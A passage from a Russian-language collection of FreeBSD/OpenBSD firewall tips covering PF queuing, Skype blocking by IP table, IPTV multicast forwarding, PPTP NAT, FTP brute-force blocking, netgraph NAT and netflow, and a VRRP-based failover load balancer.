целом приоритет этого трафика выше чем от клиентов в локальной сети. pass out quick on $ext_if inet proto tcp from ($ext_if) to any port 53 $mst queue (u_dns u_ack) pass out quick on $ext_if inet proto tcp from ($ext_if) to any $mst queue (u_pri u_ack) pass out quick on $ext_if inet proto udp from ($ext_if) to any port {53 123} queue u_dns pass out quick on $ext_if inet proto udp from ($ext_if) to <sip_peers> port 5060 queue u_hipri pass out quick on $ext_if inet proto udp from ($ext_if) to any queue u_pri pass out quick on $ext_if inet proto icmp from ($ext_if) to any $mst queue u_lowpri Есть один важный момент, на котором остановлюсь подробнее. Второе правило будет разрешать ТСР-соединения с роутера и в том числе на 80 порт. Под это правило так же подпадают пакеты, отправленные с прокси-сервера, трафик, который фактически является HTTP-трафиком клиентов из локальной сети. Т.к. в нашем случае приоритеты этих видов трафика равны (очередь u_pri), то все хорошо. Но если планируется назначить очереди разные (например, HTTP от локальных клиентов - очередь u_lowpri, а с внешнего интерфейса роутера - u_pri), тогда следует указать в правиле для прокси-сервера опцию user uid и поместить его над правилом для внешнего интерфейса роутера. Например, прокси запущен с правами пользователя nobody: pass out quick on $ext_if inet proto tcp from ($ext_if) to any user nobody $mst queue (u_lowpri u_ack) pass out quick on $ext_if inet proto tcp from ($ext_if) to any $mst queue (u_pri u_ack) Соответственно, правило, разрешающее доступ к прокси из локалной сети тоже немного измениться: необходимо поменять очередь с d_pri на d_lowpri. pass in log quick on $int_if inet proto tcp from ($int_if:network) to 127.0.0.1 port 31280 queue (d_lowpri, d_ack) Стоить отметить о наличии бага, который проявляется при использованием опции user. Об этом описано в секции BUGS на странице руководства pf.conf. Лично у меня этот баг не проявлялся. Все же старайтесь опцию user не использовать. Отладка. Отличительной способностью PF есть его протоколирование, статистика и мониторинг состояния в реальном времени что значительно облегчает конфигурирование файервола, особенно для сложных сетевых топологий. Просмотр загруженных очередей: pfctl -sq Что бы в реальном времени наблюдать загрузку очередей выполните команду: pfctl -vvsq Так же рекомендую установить из портов программу pftop, которая по аналогии с утилитой top выводит различную статистику PF в реальном времени.

Блокирование Skype по IP-адресам во FreeBSD Автор: Тикунов Максим [комментарии]

Раздумывая на досуге о наболевшем вопросе как заблокировать Skype, пришла идея, может она здесь уже описывалась, но всё таки решил поделиться личным опытом, может кому и пригодится. Первый раз заблокировать Skype удалось путём перекрытия всех не нужных портов и кое каких правил в прокси squid, которые не давали соединятся по ip-адресам методом CONNECT. Но это не самый лучший вариант, так как блокируется и всё остальное, icq, маил агенты и т.п. Новая идея основана на отслеживании и блокировке IP, на которые пытается соединиться Skype. И так, как я это делал (шлюз работает под управлением FreeBSD 8.1): 1. Нужен какой ни будь компьютер с Windows и установленным скайпом, желательно последней версии. 2. Отключаем на ПК все программы, которые могли бы обратиться в интернет, windows update и всё остальное (что бы эти адреса не попали в дальнейшем в список блокируемых). 3. Нужно включить скайп и залогиниться, что бы он взял с сервера базу ip-адресов, на которые можно соединяться. После этого выключаем его. 4. На шлюзе настраиваем фаервол, что бы он блокировал весь сетевой трафик ПК с протоколированием: ipfw add 50 deny log logamount 10000000 all from ip_машины to any пояснение: все обращение с нашей машины будут сыпаться с запретом в лог, у меня /var/log/all.log. 5. Включаем сбор логов и отсеиваем в отдельный файл: tail --f /var/log/all.log | grep ipfw: 50 > /usr/skype.ip 6. Включаем Skype на нашем компьютере и пытаемся залогиниться. получаем в файле skype.ip примерно следующее: Jul 9 14:34:10 server kernel: ipfw: 50 Deny UDP 192.168.3.41:40335 217.114.226.118:37950 in via rl0 Jul 9 14:34:11 server kernel: ipfw: 50 Deny UDP 192.168.3.41:40335 87.228.19.207:15134 in via rl0 Jul 9 14:34:12 server kernel: ipfw: 50 Deny UDP 192.168.3.41:40335 95.52.139.143:52195 in via rl0 Jul 9 14:34:12 server kernel: ipfw: 50 Deny UDP 192.168.3.41:40335 95.236.12.233:15842 in via rl0 Это малая часть моего примера из файла. Там больше записей. 7. После того, как скайп сказал, что не может соединиться, выключаем его, выключаем сбор логов и удаляем наше блокирующее правило под номером 50. 8. Теперь нам нужно из всей этой каши отобрать IP, на которые обращался скайп и заблокировать в фаерволе. Я написал не большой скрипт, создаём файлик и пишем туда следующее: # Очищаем таблицу 1, если таковая существует. ipfw table 1 flush # Запускаем считывание ip адресов(сортируем и отбираем только уникальные записи, # потому что могут быть повторяющиеся), куда стучался скайп. awk '{print ($11)}' /usr/skype.ip | sed 's#:.*##' | sort | uniq | while read ip; # Добавляем поочерёдно извлечённые адреса в таблицу 1. do ipfw table 1 add $ip done 9. Запускаем наш скрипт, если всё сделано верно, то таблица под номером 1 должна была заполниться адресами. Это можно проверить командой ipfw table 1 list 10. Всё, у нас есть таблица ip-адресов, куда соединялся скайп, теперь остаётся только написать правило: ipfw add 50 deny all from ip_машины to table$1$ 11. Включаем скайп на нашей машине и проверяем, что скайп не может залогиниться. Вот в принципе и всё. Проделав это, удалось заблокировать скайп, без вреда для других программ. Да и ещё, нужно настроить сквид, что бы тот блокировал попытку соединения вида CONNECT по ip-адресам. Если ваши пользователи знают адрес прокси сервера и порт, то они могу указать это в скайпе и тот спокойно будет работать через прокси. Как это сделать есть масса статей в интернете. И ещё нужно не забывать, что скайп может соединиться с сервером через другой компьютер, на котором запущен скайп и есть доступ в интернет. Они называются супернодами. Но у меня это не вышло, я запустил скайп на своём компьютере, залогинился и закрыл доступ другому, тот второй не смог соединиться. Есть много способов вычислить адреса на которые стучится скайп. Мой пример - это один из вариантов и он проверен. Как часто обновляется база ip адресов я не знаю, но если эту операцию проделывать несколько раз в неделю, мне кажется можно поддерживать базу ip адресов в актуальном состоянии.

Проброс IPTV-трафика в локальную сеть при помощи OpenBSD и пакетного фильтра PF (доп. ссылка 1) [комментарии]

Возникла необходимость обеспечения возможности просмотра IPTV сразу на нескольких устройствах в домашней сети. Реализации данной схемы мешало то, что полученный от провайдера модем имел два раздельных порта для данных и для IPTV. Простейшим решением было бы закорачивание IPTV-порта в домашний коммутатор, но такая схема нарушает принципы построения безопасных систем и сулит появление паразитного трафика. В связи с этим было решено организовать перенаправление IPTV-трафика через локальный шлюз, на котором используется пакетный фильтр PF и IGMP-прокси. 1. Включаем поддержку переброса между сетевыми интерфейсами мультикаст трафика, для OpenBSD: echo "multicast_router=YES" >> /etc/rc.conf.local перезагружаем систему. Активируем перенаправление мультисаст трафика: sysctl net.inet.ip.mforwarding=1 в /etc/sysctl.conf сохраняем настройку "net.inet.ip.mforwarding=1". 2. Устанавливаем пакет net/igmpproxy с реализацией igmp-прокси: pkg_add igmpproxy Отображаем свои сетевые настройки в файле конфигурации /etc/igmpproxy.conf: quickleave altnet 0.0.0.0/0 # принимаем igmp-трафик из всех подсетей phyint vr2 upstream ratelimit 0 threshold 1 phyint vr0 downstream ratelimit 0 threshold 1 phyint pppoe0 disabled Добавляем запуск igmpproxy в /etc/rc.local, чтобы прокси запустился после перезагрузки. 3. Настраиваем параметры внешнего сетевого интерфейса, через который приходит IPTV-поток. Для работы igmpproxy на интерфейсе должен быть IP-адрес, для получения которого обычно можно использовать DHCP или назначить вручную (бывают случаи привязки IP к MAC-адресу телеприставки, что потребует подмены MAC-адреса на сетевом интерфейсе шлюза). 4. Настраиваем правила для прохождения IGMP-трафика и multicast-потока в пакетном фильтре PF (в нашем случае - это UDP трафик на 5002 порт). Основной проблемой, возникающей в процессе настройки, является то, что в IGMP пакетах используется опция протокола IP "Router Alert", которая по умолчанию вычищается из пакетов при использовании PF (для отключения чистки расширенных опций необходимо использовать параметр allow-opts). В pf.conf добавляем примерно следующее: LAN = "vr0" IPTV = "vr2" block on $IPTV pass in on $IPTV inet proto udp from any to any port 5002 pass on {$LAN, $IPTV} proto igmp allow-opts

Трансляция PPTP (GRE) на шлюзе с PF (доп. ссылка 1) Автор: Князь [комментарии]

Как известно, межсетевой экран PF, портированный в FreeBSD из OpenBSD, не может корректно транслировать (NAT) GRE-протокол и, к примеру, из локальной сети невозможно создать несколько одновременных соединений к внешнему серверу VPN PPTP. Одним из способов решения проблемы является трансляция PPTP-соединений родным IPFW с "ядерным" NAT. При этом вовсе необязательно компилировать ядро. Все описанные действия проверены в FreeBSD версии 7.2. Но должно работать и в других версиях, где есть поддержка "ядерного" NAT для IPFW. В /etc/rc.conf добавляем #Включаем IPFW firewall_enable="YES" # Подгружаем модуль ядра ipfw_nat firewall_nat_enable="YES" # Указываем путь к скрипту загрузки правил firewall_script="/etc/ipfw.script" Создаем файл /etc/ipfw.script #!/bin/sh /sbin/ipfw -q /dev/stdin <<RULES flush #em0 - внешний интерфейс шлюза nat 10 config if em0 #Правила для трансляции PPTP-соединения add 10 nat 10 gre from any to any add 11 nat 10 tcp from any to any dst-port pptp add 12 nat 10 tcp from any pptp to any # Разрешаем весь трафик add allow all from any to any RULES Делаем скрипт исполняемым # chmod +x /etc/ipfw.script Добавляем в правила PF # Запрещаем PF транслировать PPTP-соединения no nat on $external_if proto gre all no nat on $external_if proto tcp from any to any port = pptp no nat on $external_if proto tcp from any port = pptp to any ... skip ... # Пропускаем PPTP-соединения pass quick on $external_if inet proto tcp from any to any port 1723 pass quick on $external_if inet proto tcp from any port 1723 to any pass quick on $external_if inet proto gre from any to any После всех сделанных изменений перезагружаемся.

Распределение трафика между двумя каналами во FreeBSD (доп. ссылка 1) Автор: pehlle [комментарии]

Во FreeBSD 7 появилась возможность задания множественных таблиц маршрутизаций. В ядре отвечает за это опция: options ROUTETABLES=[количество таблиц] Распределения трафика будет осуществляться средствами пакетного фильтра ipfw. Задаем маршруты по умолчанию: setfib 0 route add default 1.0.1.1 # таблица по умолчанию setfib 1 route add default 1.1.1.1 # новая таблица Файл конфигурации для запуска ipfw: cmd="/sbin/ipfw" $cmd add 10 check-state $cmd add 20 prob 0.5 setfib 0 tcp from 192.168.0.0/16 to not 192.168.0.0/16 setup keep-state $cmd add 30 setfib 1 tcp from 192.168.0.0/16 to not 192.168.0.0/16 setup keep-state $cmd add 40 allow all from any to any Таким образом мы задаем распределение трафика 50/50. Если каналы не равноценные то нужно выставить процентную весомость этих каналов. Трансляция адресов (NAT). Под эту задачу я выбрал ipnat, реализацию NAT от фаервола ipf. пример /etc/ipnat.rules: map vlan0 192.168.0.0/16 -> 1.0.1.1/32 map tun0 192.168.0.0/16 -> 1.1.1.1/32 Также можно выбрать демон natd или новый, работающий на уровне ядра, NAT, который появился во FreeBSD 7.

Борьба с перебором паролей на FTP сервере при помощи пакетного фильтра PF (доп. ссылка 1) [комментарии]

Для предотвращения bruteforce-атак по подбору паролей во FreeBSD или OpenBSD можно использовать возможность пакетного фильтра PF по лимитированию числа соединений за единицу времени в сочетании с блокировкой по таблицам. Добавляем в /etc/pf.conf # Подключаем ранее составленный список заблокированных за излишнее число коннектов IP table <ftp-attacks> persist file "/etc/pf.ftp.block.list" # Блокируем все входящие соединения с IP, которые присутствуют в черном списке block in quick on $ext_if from <ftp-attacks> # Выявляем IP с которых было более 5 обращений за 40 секунд # и добавляем этот IP в ранее созданную таблицу блокировки pass in quick on $ext_if inet proto tcp from any to ($ext_if) port 21 keep state (max-src-conn-rate 5/40, overload <ftp-attacks> flush global) Перечитываем конфигурацию PF: /etc/rc.d/pf reload или /sbin/pfctl -f /etc/pf.conf Далее, чтобы сохранить созданную таблицу блокировки между перезагрузками, необходимо добавить в /etc/rc.shutdown код для сброса в файл состояния таблицы перед завершением работы: /sbin/pfctl -t ftp-attacks -T show > /etc/pf.ftp.block.list Для удаления определенного IP (например, 192.168.1.1) из таблицы: /sbin/pfctl -t ftp-attacks -T delete 192.168.1.1 Для добавления IP или подсети вручную: /sbin/pfctl -t ftp-attacks -T add 192.168.1.1 /sbin/pfctl -t ftp-attacks -T add 192.168.1.0/24 Для полной очистки таблицы /sbin/pfctl -t ftp-attacks -T flush Для загрузки таблицы из файла: /sbin/pfctl -t ftp-attacks -T replace -f /etc/pf.ftp.block.list Для поиска IP в таблице /sbin/pfctl -t ftp-attacks -T test 192.168.1.1 Для вывода более подробной статистики по каждому из IP в таблице: /sbin/pfctl -t ftp-attacks -T show -v Для очистки счетчиков срабатываний: /sbin/pfctl -t ftp-attacks -T zero

Проброс сети во FreeBSD Jail через NAT и PF (доп. ссылка 1) [комментарии]

Сервер работает под управлением FreeBSD 7 и имеет два сетевых интерфейса: один для интранет сети, другой для связи с внешними миром. Задача: обеспечить доступность изолированного Jail для обоих сетей, несмотря на ограничение jail по поддержке только одного интерфейса и одного IP. Решение: через NAT организовать отправку всех запросов к адресам интранет сети 10.0.0.0/8. В /etc/pf.conf на сервере прописываем: an_if="em0" # интерфейс интранет подсети lan_if_subnet="10.0.0.0/8" lan_if_ip="10.28.11.10" # IP на интранет интерфейсе em0 jail_vps_server_ip="202.54.2.3" # Реальный IP, выделенный для Jail nat on $lan_if inet proto { tcp, udp, icmp } from $jail_vps_server_ip to $lan_if_subnet -> $lan_if_ip Перезапускаем PF через /etc/rc.d/pf reload

Трансляция адресов во FreeBSD средствами ng_nat (доп. ссылка 1) Автор: Folio [комментарии]

Для работы этого примера необходимо иметь подгруженный ng_ipfw.ko Убедиться в его наличии можно командой: /sbin/kldstat| grep ng_ipfw.ko Если ng_ipfw.ko не загружен, то загружаем его: /sbin/kldload /boot/kernel/ng_ipfw.ko После того как ng_ipfw.ko подгружен, в выводе команды: /usr/sbin/ngctl list появится строчка вида: Name: ipfw Type: ipfw ID: 00000023 Num hooks: 2 Без загруженного ng_ipfw.ko при попытке выполнить команды ngctl'а вы будете получать сообщение: ngctl: send msg: No such file or directory а при попытке добавить правило в ipfw получите: ipfw: getsockopt(IP_FW_ADD): Invalid argument Настройка ng_nat проста и сводится к скрипту: Для примера будем NAT'ить подсеть 172.16.5.96/27 через IP-адрес 192.168.20.8 на внешнем интерфейсе fxp0. #!/usr/bin/perl $ip='192.168.20.8'; $iface='fxp0'; $net='172.16.5.96/27'; $cmd=sprintf("/usr/sbin/ngctl -f - << -EOF mkpeer ipfw: nat 60 out name ipfw:60 nat connect ipfw: nat: 61 in msg nat: setaliasaddr %s ",$ip); system($cmd); ###добавляем необходимые правила в firewall $cmd=sprintf("/sbin/ipfw add 1000 netgraph 61 all from any to %s via %s in",$ip,$iface); system($cmd); $cmd=sprintf("/sbin/ipfw add 1010 netgraph 60 all from %s to any via %s out",$net,$iface); system($cmd); где: $ip - IP адрес, через который будет работать нат (который смотрит в интернет) $iface - ваш внешний интерфейс $net - IP подсеть, которую мы собираемся NAT'ить netgraph - правило в firewall, аналогично divert, только перенаправляет трафик не в socket, а в ноду netgraph, 60, 61 - адреса исходящего и входящего хуков. Если делать руками в консоли, то команды выглядят следующим образом: ###создаем ноду nat и подключаем к ipfw /usr/sbin/ngctl mkpeer ipfw: nat 60 out ###даем ноде имя "natA" /usr/sbin/ngctl name ipfw:60 natA ###соединяем входящие и исходящие хуки для "natA" /usr/sbin/ngctl connect ipfw: natA: 61 in ###посылаем управляющее сообщение в виде IP адреса, через который будет работать нат. /usr/sbin/ngctl msg natA: setaliasaddr 192.168.20.8 Если все работает, то мы можем посмотреть вывод следующей команды: ngctl show natA: Также можно посмотреть все целиком: ngctl list Для выключения настроенного NAT нужно выполнить команду: ngctl shutdown natA: Заметка: Если вы хотите запустить NAT на нескольких внешних IP-адресах, но не забывайте изменять имена нод (в примере natA) и номера хуков (в примере 60,61) т.к. они должны быть уникальны для каждого из процессов. Не путайте in и out в создаваемой ноде и правилах ipfw. Чтиво: man 8 ipfw Все о Netgraph (http://citrin.ru/netgraph/) man 4 netgraph man 4 ng_ipfw

Интернет-шлюз с использованием PF Автор: vitalic [комментарии]

O пакетном фильтре (PF) написано довольно много статей. Вот и я хочу предложить свою реализацию Интернет-шлюза с использованием PF. Раздача Интернета для локальной сети происходит через NAT и основана на Packet Tagging. Плюсом этого метода является то что упрощается настройка правил для FTP (ftp-proxy не используется), как для клиентов за шлюзом, так и для возможной публикации "внутреннего" ftp-сервера в мир. Для простоты приведу пример с 1 внешним и 1 внутренним интерфейсом. На шлюзе также запущен DNS-сервер. Пользователям локальной сети разрешен доступ на все порты без исключений по протоколам TCP, UDP, из ICMP разрешен только ping. В качестве ОС выступает FreeBSD7.0 Для начала определим интерфейсы с помощью макросов ext_if="rl0" int_if="sk1" dns="ААА.ААА.ААА.ААА" lan="192.168.1.0/24" table <no_if> {BBB.BBB.BBB.BBB, 192.168.1.1, 127.0.0.1} persist set skip on lo set loginterface rl0 set ruleset-optimization basic set block-policy return scrub in all no-df random-id ##### INET FOR LAN nat on $ext_if tag LAN_INET_NAT_TCP_UDP tagged LAN_INET_TCP_UDP -> $ext_if:0 nat on $ext_if tag LAN_INET_NAT_ICMP tagged LAN_INET_ICMP -> $ext_if:0 ###### block in block out antispoof quick for { lo $int_if } ############## EXT_IF_OUT pass out quick on $ext_if inet tagged LAN_INET_NAT_TCP_UDP pass out quick on $ext_if inet tagged LAN_INET_NAT_ICMP pass out quick on $ext_if inet proto {tcp udp} from $ext_if to $dns port = dns pass out quick on $ext_if inet proto icmp from $ext_if to any icmp-type echoreq ############## EXT_IF_IN pass in quick on $ext_if inet proto tcp from any to $ext_if port = ssh synproxy state (max 10) pass in quick on $ext_if inet proto icmp from any to $ext_if icmp-type echoreq ############## INT_IF_IN pass in quick on $int_if inet proto {tcp udp} from $lan to !<no_if> tag LAN_INET_TCP_UDP pass in quick on $int_if inet from $lan to $int_if pass in quick on $int_if inet proto icmp from $lan to !<no_if> icmp-type echoreq tag LAN_INET_ICMP pass in quick on $int_if inet proto icmp from $lan to $int_if icmp-type echoreq Пояснения. Пришедшие на внутр. интерфейс пакеты "метятся". Метятся только те пакеты, у которых dst addr любой, кроме всех внутренних и внешних интерфейсов. Это необходимо, если есть несколько подсетей и вы не хотите, что бы кто-либо из одной сети мог подключится к висящему сервису на другом интерфейсе. Впринципе здесь можно вместо !<no_if> указать any. Весь исходящий трафик с сервера в "мир" (кроме ДНС) и локальную сеть блокируется. ААА.ААА.ААА.ААА - IP DNS-сервера провайдера.

Экспорт Netflow средствами netgraph во FreeBSD Автор: VS [комментарии]

При сборке ядра указываем: options IPFIREWALL options NETGRAPH options NETGRAPH_SOCKET options NETGRAPH_IPFW options NETGRAPH_NETFLOW options NETGRAPH_KSOCKET либо подгружаем модули: kldload ipfw.ko kldload netgraph kldload ng_socket kldload ng_ipfw kldload ng_netflow kldload ng_ksocket для их автозагрузки в /boot/loader.conf добавляем: ipfw_load="YES" ng_netflow_load="YES" ng_socket_load="YES" ng_ksocket_load="YES" ng_ipfw_load="YES" в ipfw правила ipfw add 02210 netgraph 100 ip from any to any via vlan108 ipfw add 02220 netgraph 100 ip from any to any via vlan208 Скрипт, для поднятия netflow: #!/bin/sh . /etc/rc.subr name="ngnetflow" rcvar=`set_rcvar` load_rc_config $name : ${ngnetflow_enable="NO"} : ${ngnetflow_src="127.0.0.1:9999"} : ${ngnetflow_dst="127.0.0.1:9996"} start_cmd="ngnetflow_start" stop_cmd="ngnetflow_stop" ngnetflow_start() { /usr/sbin/ngctl -f- <<-SEQ mkpeer ipfw: netflow 100 iface0 name ipfw:100 netflow connect ipfw: netflow: 108 out0 msg netflow: setdlt { iface=0 dlt=12 } msg netflow: settimeouts { inactive=30 active=600 } mkpeer netflow: ksocket export inet/dgram/udp name netflow:export flowexp msg flowexp: bind inet/${ngnetflow_src} msg flowexp: connect inet/${ngnetflow_dst} SEQ } ngnetflow_stop() { /usr/sbin/ngctl -f- <<-SEQ shutdown netflow: SEQ } run_rc_command "$1"

Как сделать отказоустойчивый брандмауэр с распределением нагрузки на FreeBSD (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Задача: Сконфигурировать два или более отказоустойчивых брандмауэра на базе IPF с функцией балансировки нагрузки (далее - "FWLB") для кластера, предоставляющего сервис в сети Интернет. Если один из брандмауэров приходит в негодность, то его функции будет выполнять второй. В этом случае мы получим высокодоступную систему с черезвычайно малым временем простоя и, как мы надеемся, сэкономит немало средств на специализированных устройствах. Наша задача - получить нижепреведенную конфигурацию: ~~~ ( net ) ~~~ | | | ---------- | switch | ---------- / \ / VIP \ --------- -------- | fwlb1 | | fwlb2 | --------- -------- \ VIP / \ / --------- | switch | --------- / \ / \ --------- --------- | server1 | | server2 | --------- --------- Где первый VIP (Virtual IP) это публичный IP адресс вашего сайта, а второй - приватный IP согласно RFC 1918, который будет использоваться серверами в качестве шлюза по умолчанию. Требования: - Два сервера с FreeBSD-STABLE. У каждого из них - по 2 сетевые карты - Два коммутатора/хаба - Два или более серверов для кластера, на котором запущен предоставляемый сервис - /usr/ports/net/pen - /usr/ports/net/freevrrpd - /usr/ports/sysutils/daemontools или /usr/ports/sysutils/runit - Ядро, скомпилированное с опциями IPFILTER и IPFILTER_LOG Pen является простым, но гибким балансировщиком. FreeVRRPd будет обеспечивать отказоустойчивость. Daemontools(или runit, с более дружественной лицензией и похожим функционалом) не является необходимым, но весьма полезен для контроля и управления процессами, поэтому тоже рекомендован к использованию. Выполнение: Часть 1: Брандмауэр Создайте набор правил IPF(или IPFW, или PF), разрешающий трафик на стороне сервиса, который нуждается в балансировке. По желанию, разрешите доступ к кластеру серверов через NAT, если есть необходимость в исходящих соединениях. Конфигурирование IPF/IPNAT не рассматривается в данной статье, но на эту тему написано достаточно много. Два пункта, которые очень важно иметь в виду, заключаются в том, что вам необходимо удостовериться, что разрешен multicast между брандмауэрами (необходимо для работы VRRP) и запрещен для всех других хостов (иначе возникнет угроза безопасности). Для получения ополнительной информации по IPF, обратитесь к: http://www.nwo.net/ipf/ipf-howto.html http://coombs.anu.edu.au/~avalon/ip-filter.html Скомпилировав ядро с опциями, указанными выше, вносим следующие изменения в /etc/rc.conf: ipfilter_enable="YES" ipfilter_rules="/etc/ipf.conf" ipnat_rules="/etc/ipnat.conf" ipnat_flags="-CF" ipmon_enable="YES" И переносим набор правил в указанные места. Часть 2: Балансировщик 1) Создаем необходимых пользователей и каталоги. mkdir -p /etc/supervise/pen/log mkdir -p /var/chroot/pen mkdir -p /var/log/pen pw useradd pen -s /bin/false -d /var/chroot/pen pw useradd penlog -s /bin/false -d /var/chroot/pen chown penlog:pen /var/log/pen 2) Создаем файлы, необходимые для запуска pen. cd /etc/supervise/pen cat << _EOF_ > run #!/bin/sh exec 2>&1 exec pen -d -u pen -j /var/chroot/pen -C localhost:8888 -f -r 80 hostname1 hostname2 _EOF_ chmod 755 run cd log cat << _EOF_ > run #!/bin/sh exec /usr/local/bin/setuidgid penlog /usr/local/bin/multilog s999999 n20 /var/log/pen _EOF_ chmod 755 run Так мы сконфигурируем pen для запуска в pen в /var/chroot/pen и портом управления 8888. Он будет балансировать входящий 80 порт на порт 80 hostname1 на hostname2. Тип балансировки - round-robin - если необходимы постоянные сессии, удалите флаг "-r". В этом примере pen запущен в режиме отладки, что упростит настройку. При промышленном использовании можно удалить флаг "-d". 3) Запуск балансировщика нагрузки. cd /service ln -s /etc/supervise/pen echo "csh -cf '/usr/local/bin/svscanboot &'" >> /etc/rc.local csh -cf '/usr/local/bin/svscanboot &' sleep 5 && svstat pen Теперь вы с помощью браузера можете удостовериться, что балансировка работает. Так же изучите /var/log/pen/current на обоих брандмауэрах. Часть 3: Отказоустойчивость 1) Сперва сконфигурируйте syslog для сбора сообщений VRRP. touch /var/log/freevrrpd.log cat << _EOF_ >> /etc/syslog.conf !freevrrpd *.* /var/log/freevrrpd.log _EOF_ 2) Конфигурирование FreeVRRPd До этого пункта, обе машины были равноправны. Теперь вам необходимо выбрать, какой FWLB будет primary. На этой машине скопируйте /usr/local/etc/freevrrpd.conf.sample в /usr/local/etc/freevrrpd.conf. Отредактируйте файл, как показано ниже: # public-facing VRID [VRID] serverid = 1 interface = fxp0 priority = 255 addr = 198.123.111.1/32 password = vrid1 vridsdep = 2 # backend VRID [VRID] serverid = 2 interface = fxp1 priority = 255 addr = 10.0.0.1/32 password = vrid2 vridsdep = 1 В результате мы получим 2 VRID - один для внешней сети, второй для внутренней, который будет использоваться кластером серверов. В этом примере оба VRIDs сконфигурированы, чтобы считать этот хост главным при выборах VRRP. Заметьте - оба VRID зависят друг от друга, что определено полем "vridsdep". Это означает, что, если один из интерфейсов в FWLB падает, другой автоматически перейдет в резервный режим, переводя оба интерфейса на резервный FWLB. Это позволит избежать попыток отправить данные через брандмауэр с упавшим внешним интерфейсом. Теперь вы должны скопировать этот файл на slave FWLB, и изменить оба поля priority на значение 100. Измените пароль на что-то более безопасное, чем на примере, но особо не расчитывайте на пароли VRRP в плане безопасности. Если другой брандмауэр, находящийся вне связки сможет общаться с вашими по VRRP, то у вас будут проблемы. 3) Запуск FreeVRRPd Теперь вы можете запустить freevrrpd на обоих брандмуэрах: cp /usr/local/etc/rc.d/freevrrpd.sh{.sample,} /usr/local/etc/rc.d/freevrrpd.sh start Часть 4: Проверка отказоустойчивости Теперь нам необходимо проверить получившуюся систему на отказоустойчивость. Сперва только надо запустить на обоих FWLB SSH, чтобы была возможность проверять правильность переключения интерфейсов. Попробуйте следующие сценарии: - С одной из машин кластера залогиньтесь по SSH на 10.0.0.1(внутренний интерфейс). Убедитесь, что это именно master FWLB. - Сделайте попытку соединения на 198.123.111.1(внешний интерфейс), порт 80 и посмотрите /var/log/pen/current, чтобы проверить факт соединения. - Отключить внешний интерфейс FWLB1. - Проверьте логи на FWLB2. Сделайте попытку соединения на 198.123.111.1, порт 80, чтобы проверить факт соединения. - Зайдите по SSH на 10.0.0.1. Вы должны увидеть FWLB2 в баннере SSH. - Подключите внешний интерфейс к FWLB1. Проверьте, что оба интерфейса FWLB1 вернулись в состояние master. Теперь повторите тест, отключая внутренний интерфейс. Если есть такое желание, то можно просто нажать Reset на FWLB1. Примечания: Удаление серверов из пула: Pen не может перманентно удалить сервера из пула, но мы можем указать ему игнорировать сервер, пока, например, идет его обновление или что-то подобное. Для этого выполните команду: penctl localhost:8888 server $servername blacklist 99999 Это поместит сервер в черный список на 99999 секунд. Для возвращения сервера в пул выполните команду: penctl localhost:8888 server $servername blacklist 1 Так мы выставим таймаут черного списка в 1 секунду, после чего сервер вернется в пул. Перманентное удаление или добавление серверов в пул: В случае, если есть необходимость добавить или удалить из пула несколько серверов, нужно отредактировать файл /service/pen/run. Просто добавьте имена хостов в конец команды запуска pen и выполните: svc -t /service/pen Эта команда пошлет сигнал TERM и перезапустит pen. Хотя эта операция и не должна сказаться на доступности сервиса, лучше такие вещи делать в специально определенное время. Ссылки: http://www.faqs.org/rfcs/rfc2338.html http://www.bsdshell.net/hut_fvrrpd.html http://siag.nu/pen/ http://cr.yp.to/daemontools.html http://smarden.org/runit © 2004 David Thiel --- lx [@ at @] redundancy.redundancy.org

Использование таблиц для блокирования большого числа IP в pf или ipfw (доп. ссылка 1) [комментарии]

Список IP адресов или подсетей находится в файле /etc/block1.txt Например: 10.10.1.1 10.10.1.2 192.168.0.0/16 IPFW ---- Блок чтения IP в таблицу, проверка в которой будет осуществляться не через последовательный перебор правил, а через выборки из хэша: ipfw table 1 flush cat /etc/block1.txt | while read ip; do # echo ipfw table 1 add $ip 1 ipfw table 1 add $ip 1 done Привязка таблицы к правилу блокировки: ipfw add 100 deny ip from "table(1)" to any via em1 Просмотр содержимого таблицы: ipfw table 1 list PF -- /etc/pf.conf table <blockedips> persist file "/etc/block1.txt" ext_if="em1" block drop in log (all) quick on $ext_if from <blockedips> to any Проверка корректности правил PF: pfctl -nf /etc/pf.conf Чтение правил PF: pfctl -f /etc/pf.conf Добавление и удаление адресов из таблицы на лету: pfctl -t blockedips -T add 192.168.1.1 pfctl -t blockedips -T delete 192.168.1.1 Просмотр содержимого таблицы и более подробной статистики по каждому адресу: pfctl -t blockedips -T show pfctl -t blockedips -T show -v Просмотр лога срабатываний блокировок, умолчанию сохраняемого в /var/log/pflog: tcpdump -n -e -ttt -r /var/log/pflog tcpdump -n -e -ttt -r /var/log/pflog port 80 tcpdump -n -e -ttt -r /var/log/pflog and host 192.168.1.1 Срабатывание блокировок в режиме реального времени: tcpdump -n -e -ttt -i pflog0 tcpdump -n -e -ttt -i pflog0 port 80 tcpdump -n -e -ttt -i pflog0 host 192.168.1.1

ipfw nat во FreeBSD 7 Автор: Pikador [комментарии]

В конфигурацию ядра добавляем: options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #enable logging to syslogd(8) options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default options IPDIVERT options IPFIREWALL_FORWARD options DUMMYNET options IPFIREWALL_NAT #ipfw kernel nat support options LIBALIAS в /etc/make.conf: CFLAGS+= -DIPFIREWALL_NAT Далее пересобираем систему: cd /usr/src/ ; make builworld && make kernel KERNCONF=YourKern && make installworld reboot В конфигурационном файле ipfw: NatIP="111.111.111.111" ipfw nat 123 config ip ${NatIP} log ipfw add 10 nat 123 ip from 192.168.0.0/16 to any ipfw add 20 nat 123 ip from any to ${NatIP} Наслаждаемся достоинствами kernel nat

Автоматическая синхронизация таблиц ipfw Автор: freeseacher [комментарии]

